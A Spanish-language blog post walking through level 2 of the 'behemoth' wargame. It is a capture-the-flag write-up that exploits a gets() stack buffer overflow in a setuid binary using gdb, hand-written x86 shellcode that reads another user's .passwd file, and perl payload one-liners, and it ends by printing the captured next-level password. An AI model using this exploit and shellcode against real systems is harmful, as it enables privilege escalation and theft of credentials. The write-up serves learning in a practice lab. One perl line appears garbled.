•
Wargame behemoth: nivel 2
Seguimos con el nivel 2 del wargame behemoth. En este caso se trata de un buffer overflow como en el nivel 3 del wargame narnia, pero sin disponer del código fuente y usando stdin para el overflow en lugar de argv[1]
Primero de todo probamos el fichero:
level2@behemoth:~$ /wargame/level2 Password: caca Authentication failure. Sorry.
Podemos apreciar las llamadas que hace con un objdump:
level2@behemoth:~$ objdump -d /wargame/level2 | grep "^[0-9]" | grep plt 080482b8 <seteuid@plt-0x10>: 080482c8 <seteuid@plt>: 080482d8 <gets@plt>: 080482e8 <__libc_start_main@plt>: 080482f8 <printf@plt>: 08048308 <__gmon_start__@plt>:
A continuación podemos analizar el código:
(gdb) set disassembly-flavor intel (gdb) disass main Dump of assembler code for function main: 0x080483d4 <main+0>: push ebp 0x080483d5 <main+1>: mov ebp,esp 0x080483d7 <main+3>: sub esp,0x68 0x080483da <main+6>: and esp,0xfffffff0 0x080483dd <main+9>: mov eax,0x0 0x080483e2 <main+14>: add eax,0xf 0x080483e5 <main+17>: add eax,0xf 0x080483e8 <main+20>: shr eax,0x4 0x080483eb <main+23>: shl eax,0x4 0x080483ee <main+26>: sub esp,eax 0x080483f0 <main+28>: mov DWORD PTR [esp],0x3eb 0x080483f7 <main+35>: call 0x80482c8 <seteuid@plt> 0x080483fc <main+40>: mov DWORD PTR [esp],0x8048528 0x08048403 <main+47>: call 0x80482f8 <printf@plt> 0x08048408 <main+52>: lea eax,[ebp-88] 0x0804840b <main+55>: mov DWORD PTR [esp],eax 0x0804840e <main+58>: call 0x80482d8 <gets@plt> 0x08048413 <main+63>: mov DWORD PTR [esp],0x8048534 0x0804841a <main+70>: call 0x80482f8 <printf@plt> 0x0804841f <main+75>: leave 0x08048420 <main+76>: ret 0x08048421 <main+77>: nop 0x08048422 <main+78>: nop 0x08048423 <main+79>: nop 0x08048424 <main+80>: nop 0x08048425 <main+81>: nop 0x08048426 <main+82>: nop 0x08048427 <main+83>: nop 0x08048428 <main+84>: nop 0x08048429 <main+85>: nop 0x0804842a <main+86>: nop 0x0804842b <main+87>: nop 0x0804842c <main+88>: nop 0x0804842d <main+89>: nop 0x0804842e <main+90>: nop 0x0804842f <main+91>: nop End of assembler dump. (gdb)
Podemos hacer un buffer overflow en la variable que usa la función gets con el siguiente script:
level2@behemoth:~$ for i in $(seq 10 100); do perl -e "print \"a\"x$i; print \"\\n\";" | /wargame/level2 >/dev/null; if [ $? -ne 31 ]; then echo $i; break; fi; done Illegal instruction 92
Vemos que nos da un segmentation fault con 92 carácteres, deberemos ir añadiendo hasta que tengamos el eip lleno de a. En este caso ocurre con 96 bytes:
level2@behemoth:/tmp/jordi$ perl -e 'print "a"x96;' aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalevel2@behemoth:/tmp/jordi$ /wargame/level2 Password: level2@behemoth:/tmp/jordi$ level2@behemoth:/tmp/jordi$ level2@behemoth:/tmp/jordi$ gdb -q /wargame/level2 Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1". (gdb) r Starting program: /wargame/level2 Password: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Authentication failure. Sorry. Program received signal SIGSEGV, Segmentation fault. 0x61616161 in ?? () (gdb)
Para que se vea más claramente podemos usar 1234 como los últimos 4 bytes para sobrescribir el eip:
level2@behemoth:/tmp/jordi$ perl -e 'print "\x90"x92; print "1234";' | wc -c 96
Para trabajar más comodamente con stdin con gdb podemos usar una pipe (Debo dar las gracias a JM por la sugerencia)
level2@behemoth:/tmp/jordi$ mknod pipa p
Le indicamos a gdb que mande a stdin el contenido de pipa:
level2@behemoth:/tmp/jordi$ gdb -q /wargame/level2 Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1". (gdb) r < pipa Starting program: /wargame/level2 < pipa
Se nos queda evidentemente bloqueado, simplemente deberemos abrir otra shell y mandar a la pipe lo que queramos mandar al programa:
level2@behemoth:/tmp/jordi$ perl -e 'print "\x90"x92; print "1234";' > pipa
Podremos apreciar entonces como se ha sobrescrito el eip por 0x34333231 (4321):
Password: Authentication failure. Sorry. Program received signal SIGSEGV, Segmentation fault. 0x34333231 in ?? () (gdb)
A continuación deberemos calcular la dirección a la que saltar, para ello podemos poner un break antes de hacer el call a gets para tener la posición de memoria en eax:
(gdb) break *0x0804840e Breakpoint 1 at 0x804840e (gdb) r Starting program: /wargame/level2 Breakpoint 1, 0x0804840e in main () (gdb) info registers eax 0xbffff9f0 -1073743376 ecx 0x8048532 134513970 edx 0xb7fe1448 -1208085432 ebx 0xb7fdfff4 -1208090636 esp 0xbffff9d0 0xbffff9d0 ebp 0xbffffa48 0xbffffa48 esi 0x0 0 edi 0xb8000cc0 -1207956288 eip 0x804840e 0x804840e <main+58> eflags 0x282 [ SF IF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51
Vemos como tenemos en eax la dirección: 0xbffff9f0
Dirección donde colocaremos nuestro shellcode
Podemos probar la dirección con nops, quedando la dirección en la cadena \xf0\xf9\xff\xbf:
level2@behemoth:/tmp/jordi$ perl -e 'print "\x90"x92; print "\xf0\xf9\xff\xbf";' > pipa
Repetimos la operación con gdb:
(gdb) r < pipa Starting program: /wargame/level2 < pipa Password: Authentication failure. Sorry. Program received signal SIGILL, Illegal instruction. 0xbffffa4c in ?? () (gdb)
Como apreciamos salta a la dirección y avanza de 0xbffff9f0 hasta llegar a 0x0xbffffa4c, los 92 bytes.
A continuación, podemos adaptar el mismo shellcode que hicimos para el wargame de narnia a este nivel:
global _start section .text _start: ;; /home/level3/.passwd,0 ;;;;;;;;;;;;;;;;; ; /hom ; e/le ; vel3 ; /.pa ; sswd ; 0000 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; 0000 ; sswd dwss 64777373 ; /.pa ap./ 61702E2F ; vel3 3lev 336C6577 ; e/le el/e 656C2F65 ; /hom moh/ 6D6F682F xor eax,eax mov byte al,0x5 ;syscall 5 = open xor ebx,ebx push ebx push 0x64777373 push 0x61702E2F push 0x336C6576 push 0x656C2F65 push 0x6D6F682F mov ebx,esp ;nombre de fichero mov esi,esp xor ecx,ecx ;O_RDONLY xor edx,edx int 0x80 push eax ;descriptor xor eax,eax ;syscall 3 = read mov byte al,0x3 pop ebx ;descriptor xor edi,edi push edi ;4bytes push edi ;4bytes push edi ;4bytes push edi ;4bytes ;TOTAL: 16bytes de buffer mov ecx,esp ;buff xor edx,edx mov byte dl,0xF ;tamanyo int 0x80 push eax ; bytes read xor eax,eax mov byte al,0x4 ;syscall 4 = write xor ebx,ebx mov byte bl,0x1 ;stdout pop edx ;total leido mov ecx,esp ;buf int 0x80 xor eax,eax inc eax ;syscall 1 = exit xor ebx,ebx ;return 0 int 0x80
Podemos ensamblarlo con los siguientes comandos:
level2@behemoth:/tmp/jordi$ nasm -f elf dos.asm level2@behemoth:/tmp/jordi$ ld -s -o dos dos.o
Comprobamos que no tenemos ningún 00 (que sería fin de cadena y por lo tanto dejaría de copiar allí)
level2@behemoth:/tmp/jordi$ objdump -d -M intel dos | grep 00
A continuación con objdump podemos transformar el binario en un script en perl:
level2@behemoth:/tmp/jordi$ echo perl -e \'$(objdump -d dos | grep "^ [0-9acbdef]" | cut -f -2 | cut -f 2- | sed 's/ */ /g' | sed 's/ $//g' | sed 's/^/\\x/g' | sed 's/ /\\x/g' | sed 's/^/print "/' | sed 's/$/";/')\' perl -e 'print "\x31\xc0"; print "\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x03"; print "\x5b"; print "\x31\xff"; print "\x57"; print "\x57"; print "\x57"; print "\x57"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x5a"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80";'
Comprobamos su tamaño:
level2@behemoth:/tmp/jordi$ perl -e 'print "\x31\xc0"; print "\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x03"; print "\x5b"; print "\x31\xff"; print "\x57"; print "\x57"; print "\x57"; print "\x57"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x5a"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80";' | wc -c 83
Agregamos nops hasta llegar al tamaño requerido, dejando espacio para la dirección a la que saltar:
level2@behemoth:/tmp/jordi$ perl -e 'print "\x90"x9; print "\x31\xc0"; print "\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x03"; print "\x5b"; print "\x31\xff"; print "\x57"; print "\x57"; print "\x57"; print "\x57"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x5a"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80";' | wc -c 92
Añadimos la dirección de salto y ya lo tenemos todo:
level2@behemoth:/tmp/jordi$ perl -e 'print "\x90"x9; print "\x31\xc0"; print "\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x03"; print "\x5b"; print "\x31\xff"; print "\x57"; print "\x57"; print "\x57"; print "\x57"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x5a"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80"; print "\xf0\xf9\xff\xbf";' | wc -c 96
Pero veremos que no nos funciona dando un error:
level2@behemoth:~$ perl -e 'print "\x90"x9; print "\x31\xc0"; print "\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x03"; print "\x5b"; print "\x31\xff"; print "\x57"; print "\x57"; print "\x57"; print "\x57"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x5a"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80"; print "\xf0\xf9\xff\xbf";' | /wargame/level2 Password: Authentication failure. Sorry. Illegal instruction
Podemos examinar la memoria con gdb y veremos como el shellcode ha sido sobreescrito, ya que no son las mismas instrucciones que hemos programado nosotros:
(gdb) x/50 0xbffff9f0 0xbffff9f0: nop 0xbffff9f1: nop 0xbffff9f2: nop 0xbffff9f3: nop 0xbffff9f4: nop 0xbffff9f5: nop 0xbffff9f6: nop 0xbffff9f7: nop 0xbffff9f8: nop 0xbffff9f9: nop 0xbffff9fa: nop 0xbffff9fb: nop 0xbffff9fc: nop 0xbffff9fd: nop 0xbffff9fe: nop 0xbffff9ff: xor %eax,%eax 0xbffffa01: mov $0x5,%al 0xbffffa03: xor %ebx,%ebx 0xbffffa05: push %ebx 0xbffffa06: push $0x64777373 0xbffffa0b: push $0x61702e2f 0xbffffa10: push $0x336c6576 0xbffffa15: push $0x656c2f65 0xbffffa1a: push $0x6d6f682f 0xbffffa1f: mov %esp,%ebx 0xbffffa21: mov %esp,%esi 0xbffffa23: xor %ecx,%ecx 0xbffffa25: xor %edx,%edx 0xbffffa27: int $0x80 0xbffffa29: mov %eax,%ebx 0xbffffa2b: xor %eax,%eax 0xbffffa2d: mov $0x3,%al 0xbffffa2f: mov %esp,%ecx 0xbffffa31: xor %edx,%edx 0xbffffa33: mov $0x6f,%dl 0xbffffa35: insl (%dx),%es:(%edi) 0xbffffa36: gs 0xbffffa37: das 0xbffffa38: das 0xbffffa39: push $0x2f656d6f 0xbffffa3e: insb (%dx),%es:(%edi) 0xbffffa3f: gs 0xbffffa40: jbe 0xbffffaa7 0xbffffa42: insb (%dx),%es:(%edi) 0xbffffa43: xor (%edi),%ebp 0xbffffa45: jo,pn 0xbffffaa9 0xbffffa48: jae 0xbffffabd 0xbffffa4a: ja 0xbffffab0 0xbffffa4c: add %al,(%eax) 0xbffffa4e: add %al,(%eax)
Examinando la memoria del shellcode como datos podemos ver como desde la dirección 0xbffffa3c a la 0xbffffa4f tenemos los datos que hemos introducido en la pila con el nombre de fichero a abrir:
(gdb) x/50 0xbffff9f0 0xbffff9f0: 0x90909090 0x90909090 0x90909090 0x31909090 0xbffffa00: 0x3105b0c0 0x736853db 0x68647773 0x61702e2f 0xbffffa10: 0x6c657668 0x2f656833 0x2f68656c 0x896d6f68 0xbffffa20: 0x31e689e3 0xcdd231c9 0x31c38980 0x8903b0c0 0xbffffa30: 0xb2d231e1 0x2f656d6f 0x6d6f682f 0x656c2f65 0xbffffa40: 0x336c6576 0x61702e2f 0x64777373 0x00000000 0xbffffa50: 0x00000000 0xbffffac4 0xbffffacc 0x00000000 0xbffffa60: 0xb7fdfff4 0x00000000 0xb8000cc0 0xbffffa98 0xbffffa70: 0xbffffa50 0xb7ec7e6d 0x00000000 0x00000000 0xbffffa80: 0x00000000 0xb7ff6090 0xb7ec7ded 0xb8000ff4 0xbffffa90: 0x00000001 0x08048320 0x00000000 0x08048341 0xbffffaa0: 0x080483d4 0x00000001 0xbffffac4 0x08048480 0xbffffab0: 0x08048430 0xb7ff6c40
Deberemos entonces cambiar de sitio la pila. Podemos, por ejemplo colocarla en la dirección de salto ya que el código se lee hacia abajo mientras que la pila crece hacia arriba (yo lo pienso siempre así, hay gente que lo diría al contrario). Simplemente modificamos ebp y esp con la dirección:
global _start section .text _start: ;; /home/level3/.passwd,0 ;;;;;;;;;;;;;;;;; ; /hom ; e/le ; vel3 ; /.pa ; sswd ; 0000 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; 0000 ; sswd dwss 64777373 ; /.pa ap./ 61702E2F ; vel3 3lev 336C6577 ; e/le el/e 656C2F65 ; /hom moh/ 6D6F682F mov ebp, 0xbffff9f0 mov esp,ebp xor eax,eax mov byte al,0x05 ;syscall 5 = open xor ebx,ebx push ebx push 0x64777373 push 0x61702E2F push 0x336C6576 push 0x656C2F65 push 0x6D6F682F mov ebx,esp ;nombre de fichero mov esi,esp xor ecx,ecx ;O_RDONLY xor edx,edx int 0x80 mov ebx, eax ;descriptor xor eax,eax ;syscall 3 = read mov byte al,0x03 mov ecx,esp ;buff: cadena fichero xor edx,edx mov byte dl,0x0F ;tamanyo int 0x80 mov edx, eax ; bytes read xor eax,eax mov byte al,0x4 ;syscall 4 = write xor ebx,ebx mov byte bl,0x1 ;stdout mov ecx,esp ;buf int 0x80 xor eax,eax inc eax ;syscall 1 = exit xor ebx,ebx ;return 0 int 0x80
Volvemos a compilar:
level2@behemoth:/tmp/jordi$ nasm -f elf dos.asm level2@behemoth:/tmp/jordi$ ld -s -o dos dos.o
Generamos el script en perl con objdump:
level2@behemoth:/tmp/jordi$ echo perl -e \'$(objdump -d dos | grep "^ [0-9acbdef]" | cut -f -2 | cut -f 2- | sed 's/ */ /g' | sed 's/ $//g' | sed 's/^/\\x/g' | sed 's/ /\\x/g' | sed 's/^/print "/' | sed 's/$/";/')\' perl -e 'print "\xbd\xf0\xf9\xff\xbf"; print "\x89\xec"; print "\x31\xc0"; print "\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x89\xc3"; print "\x31\xc0"; print "\xb0\x03"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x89\xc2"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80";'
A continuación volvemos a rellenar con nops y con la dirección de salto hasta llegar a los 96 bytes:
level2@behemoth:/tmp/jordi$ perl -e 'print "\xbd\xf0\xf9\xff\xbf"; print "\x89\xec"; print "\x31\xc0"; print "\xb0\x05"; print "\x31\x\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x89\xc3"; print "\x31\xc0"; print "\xb0\x03"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x89\xc2"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80";' | wc -c 84 level2@behemoth:/tmp/jordi$ perl -e ' print "\x90"x10; print "\xbd\xf0\xf9\xff\xbf"; print "\x89\xec"; print "\x31\xc0"; print "\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x89\xc3"; print "\x31\xc0"; print "\xb0\x03"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x89\xc2"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80";' | wc -c 94 level2@behemoth:/tmp/jordi$ perl -e ' print "\x90"x10; print "\xbd\xf0\xf9\xff\xbf"; print "\x89\xec"; print "\x31\xc0"; print "\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x89\xc3"; print "\x31\xc0"; print "\xb0\x03"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x89\xc2"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80"; print "1234";' | wc -c 98 level2@behemoth:/tmp/jordi$ perl -e ' print "\x90"x8; print "\xbd\xf0\xf9\xff\xbf"; print "\x89\xec"; print "\x31\xc0"; print "\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x89\xc3"; print "\x31\xc0"; print "\xb0\x03"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x89\xc2"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80"; print "1234";' | wc -c 96 level2@behemoth:/tmp/jordi$ perl -e ' print "\x90"x8; print "\xbd\xf0\xf9\xff\xbf"; print "\x89\xec"; print "\x31\xc0"; print "\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x89\xc3"; print "\x31\xc0"; print "\xb0\x03"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x89\xc2"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80"; print "\xf0\xf9\xff\xbf";' | wc -c 96
Y ejecutamos el nivel, da lo mismo usar la named pipe que hemos creado o la pipe tradicional con un cat:
level2@behemoth:/tmp/jordi$ /wargame/level2 < pipa Password: Authentication failure. Sorry. Nu4OhT>i
Con lo cual ya tenemos la contraseña para traspasar al siguiente nivel:
Traspasando hacia el siguiente nivel
El listado de soluciones de otros niveles del wargame de behemoth es el siguiente:
Relacionados
Imprimir
Deja un comentario: